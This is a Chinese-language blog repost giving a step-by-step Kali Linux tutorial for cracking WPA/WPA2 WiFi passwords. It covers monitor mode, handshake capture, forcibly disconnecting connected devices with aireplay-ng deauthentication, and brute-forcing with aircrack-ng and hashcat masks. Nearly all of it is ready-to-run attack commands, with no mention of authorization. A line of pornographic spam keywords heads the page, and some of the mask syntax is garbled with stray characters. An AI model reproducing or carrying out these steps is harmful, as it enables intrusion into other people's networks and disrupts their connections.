日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 >

hashcat破解wifi密码(kali)

發布時間:2023/12/15 51 豆豆
生活随笔 收集整理的這篇文章主要介紹了 hashcat破解wifi密码(kali) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

第一步 將網卡處于監聽狀態

airmon-ng check airmon-ng check kill // 關閉影響監聽狀態的進程 airmon-ng start wlan0

第二步 掃描可用wifi

airodump-ng wlan0mon

第三部 獲取wifi的握手包

airodump-ng -c (上一步掃描的CH) --bssid (想要破解wifi的ssid) -w (握手文件存放目錄) wlan0mon

注意:得到wifi的握手包需要有設備連接在該wifi下,原理是將該連接的設備提下線,該設備會重新連接,我們就可以獲得該設備連接wifi時所發送的握手包。

將該wifi下的設備強制踢下去

aireplay-ng -0 0 -a (要破解的wifi的ssid) -c (強制踢下的設備的ssid) wlan0mon

當右上角出現WPA handshake ****的時候說明獲取成功

第四部 破解密碼

  • 使用aircrack-ng 破解,該方法需要字典,效率低并且成功率不高
aircrack-ng -a2 -b (破解wifi的ssid) -w (字典文件) *.cap(以cap后綴文件握手包)
  • 使用hashcat來破解,可以使用字典也可以不使用字典(這里只講不適用字典的情況)

1 將握手包轉換成hccap格式

aircrack-ng *.cap -J wpahashcat

2 進行破解

hashcat -m 2500 -a 3 wpahash.hccap ?d?d?d?d

-m 2500:代表破解WPA/WPA2

-a 3:使用掩碼暴力破解

wpahash.hccap: 為上一步轉換的hccap文件,若是提示“Old hccap format detected! You need to update”可以將第一步的命令改為

aircrack-ng *.cap -j wpahashcat //生成wpahashcat.hccapx文件

后面的字符:

但如果我們不確定某一位到底是數字還是字母怎么寫組合呢?這時候就要用到高級組合:

比如設置?--custom-charset1=?l?d?那么就表示??1代表小寫字母與數字組合,那么8位隨機的數字與小寫字母組合可以寫成??1?1?1?1?1?1?1?1,完整的例子:
hashcat test.txt -a 3 -m 0?--custom-charset1=?l?d??1?1?1?1?1?1?1?1
再比如設置?--custom-charset2=xiao106347?那么就表示??2?代表字符串由?x i a o 1 0 6 3?4 7?組成的所有可能組合,完整例子:
hashcat test.txt -a 3 -m 0?--custom-charset2=xiao106347 ?2?2?2?2?2?2?2?2

注意:1、如果提示“not a native intel openCL runtime“可以直接在后面加上 --force強制運行

? ? ? ? ? 2、如果是使用虛擬機運行可能會出現“Device #1: This device's constant buffer size is too small.
Device #1: This device's local mem size is too small”此時將虛擬機的處理器改為單核處理器

總結

以上是生活随笔為你收集整理的hashcat破解wifi密码(kali)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。